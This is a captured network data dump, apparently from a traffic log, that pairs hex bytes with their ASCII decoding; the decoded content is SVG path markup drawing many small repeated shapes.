                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14476INData Raw: 22 20 64 3d 22 4d 38 38 2e 34 32 2c 33 31 32 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 38 38 2e 31 32 2c 33 30 33 2e 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 41 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2c 38 32 2e 39 2c 33 30 35 61 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: " d="M88.42,312.18a2.18,2.18,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M88.12,303.4a2.19,2.19,0,0,1-1,2.83A3.2,3.2,0,0,1,82.9,305a3,3,0,0,1,.65-3.65,2.86,2.86,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14492INData Raw: 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 30 39 2e 38 33 2c 31 35 33 2e 32 35 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20
                                                                                                                                                                                                                                                                          Data Ascii: 1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M109.83,153.25a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14508INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 37 37 2c 32 34 38 2e 36 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 34 37 2c 32 33 39 2e 38 33 61
                                                                                                                                                                                                                                                                          Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.77,248.61a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.47,239.83a
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14524INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 34 38 2c 39 38 2e 34 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 31 38 2c 38 39 2e 36 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32
                                                                                                                                                                                                                                                                          Data Ascii: 69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.48,98.46a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.18,89.69a2.16,2.16,0,0,1-1,2.82
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14540INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 34 32 2c 31 39 33 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 31 33 2c 31 38 35 2e 30 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38
                                                                                                                                                                                                                                                                          Data Ascii: ,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M209.42,193.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M209.13,185.05a2.17,2.17,0,0,1-1,2.82,3.18
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14556INData Raw: 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 33 37 2c 32 38 39 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 30 37 2c 32 38 30 2e 34 31 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37
                                                                                                                                                                                                                                                                          Data Ascii: 9,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.37,289.18a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.07,280.41a2.16,2.16,0,0,1-1,2.82,3.17,3.17
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14572INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 37 30 2e 30 38 2c 31 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 36 39 2e 37 38 2c 31 33 30 2e 32 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d
                                                                                                                                                                                                                                                                          Data Ascii: "></path><path class="cls-7" d="M270.08,139a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M269.78,130.26a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14588INData Raw: 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 39 2c 32 33 34 2e 34 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 38 2e 37 32 2c 32 32 35 2e 36 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: h><path class="cls-7" d="M309,234.4a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M308.72,225.62a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14604INData Raw: 3d 22 4d 33 33 30 2e 37 33 2c 38 34 2e 32 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 34 37 2e 36 37 2c 33 32 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: ="M330.73,84.25a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.87,2.87,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M347.67,321a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14620INData Raw: 20 64 3d 22 4d 33 36 39 2e 36 37 2c 31 37 39 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 39 2e 33 38 2c 31 37 30 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: d="M369.67,179.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M369.38,170.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14636INData Raw: 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 31 2e 37 2c 33 33 39 2e 31 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                          Data Ascii: 09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M311.7,339.13a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class=
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14652INData Raw: 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 34 2c 31 39 32 2e 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 31 2e 31 33 2c 31 38 34 2e 38 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38
                                                                                                                                                                                                                                                                          Data Ascii: 3.32"></path><path class="cls-9" d="M331.4,192.9a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"></path><path class="cls-9" d="M331.13,184.83a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14668INData Raw: 36 37 2c 32 37 32 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 36 2e 36 39 2c 32 36 34 2e 34 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: 67,272.57a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.19,3.33"></path><path class="cls-9" d="M366.69,264.49a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.63,2.63,0,0,1,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14684INData Raw: 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 32 35 2c 33 34 34 2e 31 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2c 33 33 36 2e 30 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: ,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M402.25,344.16a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M402,336.08a2,2,0,0,1-.9,2.6,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14700INData Raw: 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 31 2e 36 37 2c 31 38 39 2e 38 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61
                                                                                                                                                                                                                                                                          Data Ascii: -3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M421.67,189.85a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><pa
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14716INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2e 32 33 2c 32 36 39 2e 35 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2c 32 36 31 2e 34 34 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: "></path><path class="cls-9" d="M457.23,269.51a2,2,0,0,1-.9,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M457,261.44a2,2,0,0,1-.91,2.6,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC14732INData Raw: 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 35 32 2c 33 34 31 2e 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 32 35 2c 33 33 33 61 32 2c 32 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: ,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M492.52,341.1a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"></path><path class="cls-9" d="M492.25,333a2,2,0,0
